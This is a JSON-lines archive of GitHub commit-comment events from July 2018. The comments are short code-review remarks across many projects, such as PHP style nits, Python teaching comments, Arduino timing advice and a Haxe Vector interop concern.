{"id":"7910612665","type":"CommitCommentEvent","actor":{"login":"andyli"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":29576044,"position":34,"line":34,"path":"std/php/_std/haxe/ds/Vector.hx","commit_id":"4a7a9bf57005e634711ee8735a886fc6d0c6a0b7","created_at":"2018-07-03T06:57:37Z","updated_at":"2018-07-03T06:57:37Z","author_association":"MEMBER","body":"I'm not sure if it is a good idea. It makes the `haxe.ds.Vector` hard to interop with extern code because `toData()` and `fromData()` use `VectorData`, and since the `data` field is private, users can't use its internal `NativeIndexedArray`. It is also not possible to wrap an existing `NativeIndexedArray` into a `haxe.ds.Vector` easily.\r\n\r\nI guess the reason of introducing this is to store the length? Looks like [`count()` is O(1)](https://stackoverflow.com/questions/5835241/is-phps-count-function-o1-or-on-for-arrays/5835419) anyway so maybe just use it?"}},"created_at":"2018-07-03T06:57:37Z"}
{"id":"7910613572","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576047,"position":18,"line":18,"path":"app/User.php","commit_id":"1869f8d5daf9d0fef999ba87666bbbbeb8a16bf3","created_at":"2018-07-03T06:57:51Z","updated_at":"2018-07-03T06:57:51Z","author_association":"NONE","body":"each on new line"}},"created_at":"2018-07-03T06:57:51Z"}
{"id":"7910613619","type":"CommitCommentEvent","actor":{"login":"zx70"},"repo":{"name":"z88dk/z88dk"},"payload":{"comment":{"id":29576048,"position":null,"line":null,"path":null,"commit_id":"72dc6dd27bccea34a0634caedfcce0c1962e3fbc","created_at":"2018-07-03T06:57:52Z","updated_at":"2018-07-03T06:57:52Z","author_association":"MEMBER","body":"Thank you !!"}},"created_at":"2018-07-03T06:57:52Z"}
{"id":"7910613966","type":"CommitCommentEvent","actor":{"login":"xyzabcdefg"},"repo":{"name":"xyzabcdefg/rep"},"payload":{"comment":{"id":29576049,"position":null,"line":null,"path":null,"commit_id":"73443972d6c7ccf465cf6d900e4d336ff169046a","created_at":"2018-07-03T06:57:58Z","updated_at":"2018-07-03T06:57:58Z","author_association":"OWNER","body":"### This is  a commit"}},"created_at":"2018-07-03T06:57:58Z"}
{"id":"7910618399","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576055,"position":20,"line":20,"path":"database/migrations/2018_06_29_052212_create_states_table.php","commit_id":"1869f8d5daf9d0fef999ba87666bbbbeb8a16bf3","created_at":"2018-07-03T06:59:05Z","updated_at":"2018-07-03T06:59:05Z","author_association":"NONE","body":"nit: alignment"}},"created_at":"2018-07-03T06:59:05Z"}
{"id":"7910622207","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576063,"position":21,"line":21,"path":"database/migrations/2018_06_29_052249_create_pincodes_table.php","commit_id":"1869f8d5daf9d0fef999ba87666bbbbeb8a16bf3","created_at":"2018-07-03T07:00:03Z","updated_at":"2018-07-03T07:00:03Z","author_association":"NONE","body":"keep a max value. string defaults to `255`"}},"created_at":"2018-07-03T07:00:03Z"}
{"id":"7910622660","type":"CommitCommentEvent","actor":{"login":"maleke9"},"repo":{"name":"gregoryseibert/DHBW-SE-Projekt"},"payload":{"comment":{"id":29576069,"position":null,"line":null,"path":null,"commit_id":"f74d4a0bb87c43c7980ade6cbaeccdc2b3035421","created_at":"2018-07-03T07:00:09Z","updated_at":"2018-07-03T07:00:09Z","author_association":"COLLABORATOR","body":"Warum braucht es bei der XML Import funktion diese Argument importable? Ist das so realisiert um die Deklaration auszulagern ?"}},"created_at":"2018-07-03T07:00:09Z"}
{"id":"7910626491","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576082,"position":19,"line":19,"path":"tests/Feature/ExampleTest.php","commit_id":"1869f8d5daf9d0fef999ba87666bbbbeb8a16bf3","created_at":"2018-07-03T07:01:00Z","updated_at":"2018-07-03T07:01:00Z","author_association":"NONE","body":"assert response as well"}},"created_at":"2018-07-03T07:01:00Z"}
{"id":"7910627319","type":"CommitCommentEvent","actor":{"login":"AlexGhiondea"},"repo":{"name":"hanabi1224/CommandLine"},"payload":{"comment":{"id":29576087,"position":null,"line":null,"path":null,"commit_id":"dd4f87eef25aae9e9ff21a2783299093e144aa0b","created_at":"2018-07-03T07:01:11Z","updated_at":"2018-07-03T07:01:11Z","author_association":"NONE","body":"I have mostly figured it out -- I had to change the way the tests and code coverage was running, but should have both back up shortly (just for netcoreapp2.0)."}},"created_at":"2018-07-03T07:01:11Z"}
{"id":"7910629503","type":"CommitCommentEvent","actor":{"login":"JyothiGadad"},"repo":{"name":"JyothiGadad/MIT_Application_For_servo"},"payload":{"comment":{"id":29576101,"position":null,"line":null,"path":null,"commit_id":"501ce2a23e1d669770798cdec524d1da67db414e","created_at":"2018-07-03T07:01:42Z","updated_at":"2018-07-03T07:01:42Z","author_association":"OWNER","body":"A basic code for servo motor, by uploading this code you are can move the servo motor till 180 degree"}},"created_at":"2018-07-03T07:01:42Z"}
{"id":"7910630037","type":"CommitCommentEvent","actor":{"login":"kobigi"},"repo":{"name":"ceph/ceph-ansible"},"payload":{"comment":{"id":29576104,"position":null,"line":null,"path":null,"commit_id":"090ecff94e341a674556c0f4f578caa73330a0f0","created_at":"2018-07-03T07:01:50Z","updated_at":"2018-07-03T07:01:50Z","author_association":"NONE","body":"Hi\r\nyes of course i will start reproduction and send you the logs,\r\nmeanwhile i want to share that we came back to original file content of ceph-3.0 package create_users_keys.yml\r\nand the issue gone away.\r\nWorth looking at the differences also\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-03T07:01:50Z"}
{"id":"7910630568","type":"CommitCommentEvent","actor":{"login":"1314wu"},"repo":{"name":"1314wu/PerceptionAndFast"},"payload":{"comment":{"id":29576106,"position":2,"line":2,"path":"README.md","commit_id":"59f4509e2d40b34f3b66a8595a7a6afdd867f2cb","created_at":"2018-07-03T07:01:57Z","updated_at":"2018-07-03T07:01:57Z","author_association":"OWNER","body":"这是什么"}},"created_at":"2018-07-03T07:01:57Z"}
{"id":"7910632994","type":"CommitCommentEvent","actor":{"login":"karthikkm007"},"repo":{"name":"ResurrectionRemix-Devices/android_device_wingtech_wt88047"},"payload":{"comment":{"id":29576113,"position":null,"line":null,"path":null,"commit_id":"6594229f7b11cad082b98c8ca2226fa340885dba","created_at":"2018-07-03T07:02:31Z","updated_at":"2018-07-03T07:02:31Z","author_association":"CONTRIBUTOR","body":"TG @karthikkm"}},"created_at":"2018-07-03T07:02:31Z"}
{"id":"7910633286","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576114,"position":16,"line":29,"path":"app/Validations/PinValidator.php","commit_id":"7b8afc7ad85a9a068b2b98a240ae96d53da51d02","created_at":"2018-07-03T07:02:35Z","updated_at":"2018-07-03T07:02:35Z","author_association":"NONE","body":"not readable. Also, compare with `true` or `false` instead of using the `not` operator.\r\nGuidelines - \r\n```\r\nif ((condition1 === true) or (condition2 === false))\r\n```"}},"created_at":"2018-07-03T07:02:35Z"}
{"id":"7910633715","type":"CommitCommentEvent","actor":{"login":"hubert-kodilla"},"repo":{"name":"DamianTrzonek/First-REST-API"},"payload":{"comment":{"id":29576116,"position":34,"line":34,"path":"src/test/java/com/crud/tasks/mapper/TrelloMapperTestSuite.java","commit_id":"ef42105d2280a3ce7e42844f5575d2dc19f81275","created_at":"2018-07-03T07:02:41Z","updated_at":"2018-07-03T07:02:41Z","author_association":"NONE","body":"Powinno być testBoards lub testBoardList skoro jest to lista"}},"created_at":"2018-07-03T07:02:41Z"}
{"id":"7910634359","type":"CommitCommentEvent","actor":{"login":"ChingChang9"},"repo":{"name":"ChingChang9/Rock-Paper-Scissors"},"payload":{"comment":{"id":29576117,"position":null,"line":null,"path":null,"commit_id":"01fc28dd8cbc1083196b352630fa16e56e00744b","created_at":"2018-07-03T07:02:51Z","updated_at":"2018-07-03T07:02:51Z","author_association":"OWNER","body":"restore this version\r\n"}},"created_at":"2018-07-03T07:02:51Z"}
{"id":"7910637341","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576121,"position":31,"line":30,"path":"tests/Feature/httpTest.php","commit_id":"db2da230f1bb6b2bc8225bbf28424d3557b77da5","created_at":"2018-07-03T07:03:36Z","updated_at":"2018-07-03T07:03:36Z","author_association":"NONE","body":"store the base url somewhere else and then use it here"}},"created_at":"2018-07-03T07:03:36Z"}
{"id":"7910639556","type":"CommitCommentEvent","actor":{"login":"shawnchain"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":29576127,"position":11,"line":76,"path":"P25NID.cpp","commit_id":"074919ea5c900d3b0598e8703041208609e16af9","created_at":"2018-07-03T07:04:08Z","updated_at":"2018-07-03T07:04:08Z","author_association":"NONE","body":"Don't forget to release m_tsdu inside destructor."}},"created_at":"2018-07-03T07:04:08Z"}
{"id":"7910639798","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576129,"position":61,"line":58,"path":"tests/Feature/httpTest.php","commit_id":"db2da230f1bb6b2bc8225bbf28424d3557b77da5","created_at":"2018-07-03T07:04:11Z","updated_at":"2018-07-03T07:04:11Z","author_association":"NONE","body":"keep a function like `getAllPincodes()`"}},"created_at":"2018-07-03T07:04:11Z"}
{"id":"7910640163","type":"CommitCommentEvent","actor":{"login":"NareshIn"},"repo":{"name":"NareshIn/MyPod"},"payload":{"comment":{"id":29576130,"position":null,"line":null,"path":null,"commit_id":"7865d3728ff5791f8ab7bfef14e3ad6083d5c87e","created_at":"2018-07-03T07:04:15Z","updated_at":"2018-07-03T07:04:15Z","author_association":"OWNER","body":"sum changes"}},"created_at":"2018-07-03T07:04:15Z"}
{"id":"7910640673","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576133,"position":74,"line":71,"path":"tests/Feature/httpTest.php","commit_id":"db2da230f1bb6b2bc8225bbf28424d3557b77da5","created_at":"2018-07-03T07:04:22Z","updated_at":"2018-07-03T07:04:22Z","author_association":"NONE","body":"string to constant"}},"created_at":"2018-07-03T07:04:22Z"}
{"id":"7910640763","type":"CommitCommentEvent","actor":{"login":"stevstrong"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29576134,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T07:04:23Z","updated_at":"2018-07-03T07:04:23Z","author_association":"CONTRIBUTOR","body":"I think using `micros()` instead `millis()` would be even better, having higher resolution."}},"created_at":"2018-07-03T07:04:23Z"}
{"id":"7910641808","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576136,"position":47,"line":44,"path":"tests/Feature/httpTest.php","commit_id":"e76f8b6b5939e775380385399e93dc3dd6874d88","created_at":"2018-07-03T07:04:39Z","updated_at":"2018-07-03T07:04:39Z","author_association":"NONE","body":"line breaks"}},"created_at":"2018-07-03T07:04:39Z"}
{"id":"7910643165","type":"CommitCommentEvent","actor":{"login":"xiulipan"},"repo":{"name":"thesofproject/soft"},"payload":{"comment":{"id":29576138,"position":null,"line":null,"path":null,"commit_id":"229da95e0d5a9d8abce89a5bb3804926b74d1ba0","created_at":"2018-07-03T07:04:59Z","updated_at":"2018-07-03T07:04:59Z","author_association":"CONTRIBUTOR","body":"That is a good idea.\r\nThen I think https://github.com/thesofproject/soft/issues/11\r\nand https://github.com/thesofproject/linux/issues/11\r\nshould be merged.\r\nThe first step of multiple dai config should be refine the sof bespoken handler for dai config.\r\n"}},"created_at":"2018-07-03T07:04:59Z"}
{"id":"7910644442","type":"CommitCommentEvent","actor":{"login":"Stifael"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":29576143,"position":4,"line":8,"path":"src/lib/FlightTasks/tasks/FlightTask.cpp","commit_id":"b71732e484b9dc039b18140ddcacba1161ca111b","created_at":"2018-07-03T07:05:14Z","updated_at":"2018-07-03T07:05:14Z","author_association":"CONTRIBUTOR","body":"what is again the last zero for?"}},"created_at":"2018-07-03T07:05:14Z"}
{"id":"7910644644","type":"CommitCommentEvent","actor":{"login":"EchoFoe"},"repo":{"name":"EchoFoe/Ekas"},"payload":{"comment":{"id":29576145,"position":null,"line":null,"path":null,"commit_id":"6231ff2d09eeb4366d89ef347251cdc62ba77309","created_at":"2018-07-03T07:05:18Z","updated_at":"2018-07-03T07:05:18Z","author_association":"OWNER","body":"apartments_phone"}},"created_at":"2018-07-03T07:05:18Z"}
{"id":"7910644872","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576146,"position":22,"line":22,"path":"app/Models/Pincode.php","commit_id":"1639ad3ee93995ae70e51f3afa366efcb59bf97c","created_at":"2018-07-03T07:05:21Z","updated_at":"2018-07-03T07:05:21Z","author_association":"NONE","body":"move all exception messages to one class, define as constants and use it here"}},"created_at":"2018-07-03T07:05:21Z"}
{"id":"7910648216","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576155,"position":2,"line":2,"path":"test2.py","commit_id":"c1400fe65b4ad6be97c0d4b8d76f9ef6d4fb6825","created_at":"2018-07-03T07:06:08Z","updated_at":"2018-07-03T07:06:08Z","author_association":"NONE","body":"You can add two empty lines above the class declaration for better code readability."}},"created_at":"2018-07-03T07:06:08Z"}
{"id":"7910648467","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576156,"position":33,"line":33,"path":"app/Services/PinService.php","commit_id":"1639ad3ee93995ae70e51f3afa366efcb59bf97c","created_at":"2018-07-03T07:06:11Z","updated_at":"2018-07-03T07:06:11Z","author_association":"NONE","body":"guidelines"}},"created_at":"2018-07-03T07:06:11Z"}
{"id":"7910649760","type":"CommitCommentEvent","actor":{"login":"xyzabcdefg"},"repo":{"name":"gainbits/git-for-marketers"},"payload":{"comment":{"id":29576157,"position":null,"line":null,"path":null,"commit_id":"1c7829c94b851315b9b0ea172da0d90582854a28","created_at":"2018-07-03T07:06:28Z","updated_at":"2018-07-03T07:06:28Z","author_association":"NONE","body":"sdg"}},"created_at":"2018-07-03T07:06:28Z"}
{"id":"7910649850","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576158,"position":39,"line":39,"path":"app/Services/PinService.php","commit_id":"1639ad3ee93995ae70e51f3afa366efcb59bf97c","created_at":"2018-07-03T07:06:29Z","updated_at":"2018-07-03T07:06:29Z","author_association":"NONE","body":"we use `else if` and not `elseif`"}},"created_at":"2018-07-03T07:06:29Z"}
{"id":"7910651191","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576159,"position":55,"line":55,"path":"app/Services/PinService.php","commit_id":"1639ad3ee93995ae70e51f3afa366efcb59bf97c","created_at":"2018-07-03T07:06:48Z","updated_at":"2018-07-03T07:06:48Z","author_association":"NONE","body":"do a basic cleanup before pushing code"}},"created_at":"2018-07-03T07:06:48Z"}
{"id":"7910651173","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576162,"position":7,"line":7,"path":"test2.py","commit_id":"c1400fe65b4ad6be97c0d4b8d76f9ef6d4fb6825","created_at":"2018-07-03T07:06:49Z","updated_at":"2018-07-03T07:06:49Z","author_association":"NONE","body":"__call__() is a Python magic method that adds function calling meaning to instances of a class."}},"created_at":"2018-07-03T07:06:49Z"}
{"id":"7910653221","type":"CommitCommentEvent","actor":{"login":"7ssaa"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576166,"position":2,"line":2,"path":"test2.py","commit_id":"c1400fe65b4ad6be97c0d4b8d76f9ef6d4fb6825","created_at":"2018-07-03T07:07:18Z","updated_at":"2018-07-03T07:07:18Z","author_association":"OWNER","body":"Understood. Thank you!\n\nSatish Goda <notifications@github.com>于2018年7月3日 周二下午3:06写道：\n\n> You can add two empty lines above the class declaration for better code\n> readability.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/7ssaa/training/commit/c1400fe65b4ad6be97c0d4b8d76f9ef6d4fb6825#commitcomment-29576155>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AStTVPSXD6g9BVAvt3mnuuVOXhn5uKD-ks5uCxfggaJpZM4VAZsX>\n> .\n>\n-- \nShiye Sa\nPhone: +86 13816549216\nMail: shiye.sa@gmail.com\n"}},"created_at":"2018-07-03T07:07:18Z"}
{"id":"7910653812","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576167,"position":22,"line":22,"path":"app/Tasks/PincodeCron.php","commit_id":"1639ad3ee93995ae70e51f3afa366efcb59bf97c","created_at":"2018-07-03T07:07:28Z","updated_at":"2018-07-03T07:07:28Z","author_association":"NONE","body":"keys should never be pushed to GitHub. keep a local env file and define it there."}},"created_at":"2018-07-03T07:07:28Z"}
{"id":"7910655298","type":"CommitCommentEvent","actor":{"login":"xyzabcdefg"},"repo":{"name":"gainbits/git-for-marketers"},"payload":{"comment":{"id":29576174,"position":1,"line":5,"path":"index.html","commit_id":"1c7829c94b851315b9b0ea172da0d90582854a28","created_at":"2018-07-03T07:07:49Z","updated_at":"2018-07-03T07:07:49Z","author_association":"NONE","body":"fghfdh"}},"created_at":"2018-07-03T07:07:49Z"}
{"id":"7910656740","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576177,"position":21,"line":21,"path":"test2.py","commit_id":"c1400fe65b4ad6be97c0d4b8d76f9ef6d4fb6825","created_at":"2018-07-03T07:08:09Z","updated_at":"2018-07-03T07:08:09Z","author_association":"NONE","body":"We can add another empty line for better code readability"}},"created_at":"2018-07-03T07:08:09Z"}
{"id":"7910657801","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576181,"position":97,"line":97,"path":"app/Tasks/PincodeCron.php","commit_id":"1639ad3ee93995ae70e51f3afa366efcb59bf97c","created_at":"2018-07-03T07:08:26Z","updated_at":"2018-07-03T07:08:26Z","author_association":"NONE","body":"new line char at the end. set your phpstorm preferences to automatically add that when you save the fiel"}},"created_at":"2018-07-03T07:08:26Z"}
{"id":"7910661910","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576190,"position":21,"line":21,"path":"test2.py","commit_id":"c1400fe65b4ad6be97c0d4b8d76f9ef6d4fb6825","created_at":"2018-07-03T07:09:30Z","updated_at":"2018-07-03T07:09:30Z","author_association":"NONE","body":"```changeRGBColors``` is an instance of the class ```ChangeColor```.\r\n\r\nAn instance is a blueprint of a class and will carry its own copy of data (attributes) but the same behaviors (methods) are used between instances."}},"created_at":"2018-07-03T07:09:30Z"}
{"id":"7910662882","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576192,"position":10,"line":10,"path":"tests/Feature/httpTest.php","commit_id":"1639ad3ee93995ae70e51f3afa366efcb59bf97c","created_at":"2018-07-03T07:09:44Z","updated_at":"2018-07-03T07:09:44Z","author_association":"NONE","body":"use tree structure.\r\n\r\n```\r\nimport something;\r\nimport some\\other\\thing;\r\nimport a\\longer\\library\\in\\PHP;\r\nimport an\\even\\longer\\library\\in\\PHP;\r\n```"}},"created_at":"2018-07-03T07:09:44Z"}
{"id":"7910665009","type":"CommitCommentEvent","actor":{"login":"justinschoeman"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29576195,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T07:10:15Z","updated_at":"2018-07-03T07:10:15Z","author_association":"NONE","body":"I looked at micros(), but there is a potential range issue.  The stock AVR core solution should work in all cases:\r\n`void delay(unsigned long ms)\r\n{\r\n        uint32_t start = micros();\r\n\r\n        while (ms > 0) {\r\n                yield();\r\n                while ( ms > 0 && (micros() - start) >= 1000) {\r\n                        ms--;\r\n                        start += 1000;\r\n                }\r\n        }\r\n}\r\n`\r\ni.e. use micros() but only 1000 at a time to prevent overflow issues with large delays. (Unless the STM32 core uses 64 bit precision for micros()?)"}},"created_at":"2018-07-03T07:10:15Z"}
{"id":"7910666058","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576198,"position":40,"line":40,"path":"tests/Feature/httpTest.php","commit_id":"1639ad3ee93995ae70e51f3afa366efcb59bf97c","created_at":"2018-07-03T07:10:30Z","updated_at":"2018-07-03T07:10:30Z","author_association":"NONE","body":"store the output of json_encode in a variable and use it here"}},"created_at":"2018-07-03T07:10:30Z"}
{"id":"7910667913","type":"CommitCommentEvent","actor":{"login":"fguitton"},"repo":{"name":"dsi-icl/optimise-ui"},"payload":{"comment":{"id":29576203,"position":4,"line":48,"path":"public/index.html","commit_id":"44b12a4e81c7c4617c443b5cbe5ca02d520b89d1","created_at":"2018-07-03T07:11:00Z","updated_at":"2018-07-03T07:11:00Z","author_association":"MEMBER","body":"Be careful with that, that will effectively prevent your users to zoom in on the page (e.g. `Ctrl`+`+`, `Ctrl`+`-`, `Ctrl`+`0`) unless you provide a programmatic way of doing so 😈 "}},"created_at":"2018-07-03T07:11:00Z"}
{"id":"7910671453","type":"CommitCommentEvent","actor":{"login":"Encamy"},"repo":{"name":"alfredh/baresip"},"payload":{"comment":{"id":29576211,"position":null,"line":null,"path":null,"commit_id":"fe823bd138ca335c6668a604f858e7bf80ad1a79","created_at":"2018-07-03T07:11:53Z","updated_at":"2018-07-03T07:11:53Z","author_association":"CONTRIBUTOR","body":"@alfredh I have noticed that in `src/audio.c` the parameters of `auplay_write_handler` and `ausrc_read_handler`  in the comments are different from those declared in the function. Should this be fixed?\r\n\r\nAlexey"}},"created_at":"2018-07-03T07:11:53Z"}
{"id":"7910671751","type":"CommitCommentEvent","actor":{"login":"382379437"},"repo":{"name":"382379437/web_auto_code"},"payload":{"comment":{"id":29576212,"position":null,"line":null,"path":null,"commit_id":"56414ec8d8ab999bf8bde30290a7e61cb94fce50","created_at":"2018-07-03T07:11:58Z","updated_at":"2018-07-03T07:11:58Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-03T07:11:58Z"}
{"id":"7910672964","type":"CommitCommentEvent","actor":{"login":"Eiminyang"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29576214,"position":null,"line":null,"path":null,"commit_id":"462ad31729b3854d33b58582eadf0c24ad232ba4","created_at":"2018-07-03T07:12:16Z","updated_at":"2018-07-03T07:12:16Z","author_association":"NONE","body":"![0x4e27a56b7618024a487d628fcbbef9759ea2540d](https://user-images.githubusercontent.com/39787209/42204162-73c2df26-7ed3-11e8-9dca-9ce493e5a928.png)\r\n"}},"created_at":"2018-07-03T07:12:16Z"}
{"id":"7910673432","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576216,"position":4,"line":4,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:12:24Z","updated_at":"2018-07-03T07:12:24Z","author_association":"NONE","body":"The above triple-quoted string is a module level comment."}},"created_at":"2018-07-03T07:12:24Z"}
{"id":"7910673919","type":"CommitCommentEvent","actor":{"login":"382379437"},"repo":{"name":"382379437/web_auto_code"},"payload":{"comment":{"id":29576217,"position":1,"line":1,"path":"README.md","commit_id":"56414ec8d8ab999bf8bde30290a7e61cb94fce50","created_at":"2018-07-03T07:12:31Z","updated_at":"2018-07-03T07:12:31Z","author_association":"OWNER","body":"test  info"}},"created_at":"2018-07-03T07:12:31Z"}
{"id":"7910675298","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576224,"position":6,"line":6,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:12:51Z","updated_at":"2018-07-03T07:12:51Z","author_association":"NONE","body":"This is a single python statement that prints a string."}},"created_at":"2018-07-03T07:12:51Z"}
{"id":"7910677301","type":"CommitCommentEvent","actor":{"login":"adamgreen"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29576230,"position":29,"line":1659,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.cpp","commit_id":"7fc41f6923bbeff6da944f54669237e9327d1fd1","created_at":"2018-07-03T07:13:21Z","updated_at":"2018-07-03T07:13:21Z","author_association":"NONE","body":"My personal vote would be to not bother with adding the enableTrackingMode() and enableDefaultMode(). This functionality is already covered by tested functions that I find to be better named."}},"created_at":"2018-07-03T07:13:21Z"}
{"id":"7910679748","type":"CommitCommentEvent","actor":{"login":"shawnchain"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":29576238,"position":5,"line":181,"path":"Nextion.cpp","commit_id":"758d5b00079dbd0273837dbc24cc87f2be62e56c","created_at":"2018-07-03T07:13:56Z","updated_at":"2018-07-03T07:13:56Z","author_association":"NONE","body":"Why not using snprintf() here ?"}},"created_at":"2018-07-03T07:13:56Z"}
{"id":"7910680517","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576241,"position":8,"line":8,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:14:08Z","updated_at":"2018-07-03T07:14:08Z","author_association":"NONE","body":"We can store values in variables so that we do not have to type the same value again and again.\r\n\r\nThe type of value stored in a variable can be found out by using type(msg).\r\n\r\nBuilt in types in Python are : int, float, str, tuple, dict, set"}},"created_at":"2018-07-03T07:14:08Z"}
{"id":"7910680820","type":"CommitCommentEvent","actor":{"login":"g4klx"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":29576244,"position":11,"line":76,"path":"P25NID.cpp","commit_id":"074919ea5c900d3b0598e8703041208609e16af9","created_at":"2018-07-03T07:14:12Z","updated_at":"2018-07-03T07:14:12Z","author_association":"OWNER","body":" Thanks for that. It's fixed in the POCSAG branch and will be in master in due course,\n\n    On Tuesday, 3 July 2018, 08:04:10 BST, Shawn <notifications@github.com> wrote:  \n \n \nDon't forget to release m_tsdu inside destructor.\n\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n   "}},"created_at":"2018-07-03T07:14:12Z"}
{"id":"7910682689","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576254,"position":11,"line":11,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:14:39Z","updated_at":"2018-07-03T07:14:39Z","author_association":"NONE","body":"```time``` is a Python standard library module that comes shipped with Python."}},"created_at":"2018-07-03T07:14:39Z"}
{"id":"7910683896","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29576260,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T07:14:56Z","updated_at":"2018-07-03T07:14:56Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-03T07:14:56Z"}
{"id":"7910686230","type":"CommitCommentEvent","actor":{"login":"bhargavi007"},"repo":{"name":"RuthviReddy/Blog-app"},"payload":{"comment":{"id":29576266,"position":113,"line":113,"path":"app.js","commit_id":"39e979fcf98cc3201d7ab1c6980da1a77241e6e9","created_at":"2018-07-03T07:15:28Z","updated_at":"2018-07-03T07:15:28Z","author_association":"NONE","body":"change facbook --> facebook"}},"created_at":"2018-07-03T07:15:28Z"}
{"id":"7910689329","type":"CommitCommentEvent","actor":{"login":"Imundy"},"repo":{"name":"Faithlife/styled-ui"},"payload":{"comment":{"id":29576268,"position":15,"line":107,"path":"components/modal/modal.jsx","commit_id":"903c61c562ec66c8bb2dcba686b4b9a1726fad2d","created_at":"2018-07-03T07:16:11Z","updated_at":"2018-07-03T07:16:11Z","author_association":"MEMBER","body":"TIL: JSDOM stubs `Element.prototype.clientWidth` to return 0, so as it currently stands this would result in an infinite render loop when doing unit tests with Jest (or something else leveraging JSDOM). You can get around that limitation with `Object.defineProperty`, but it seems to make more sense to fix it here rather than make people know this detail when they are writing tests."}},"created_at":"2018-07-03T07:16:11Z"}
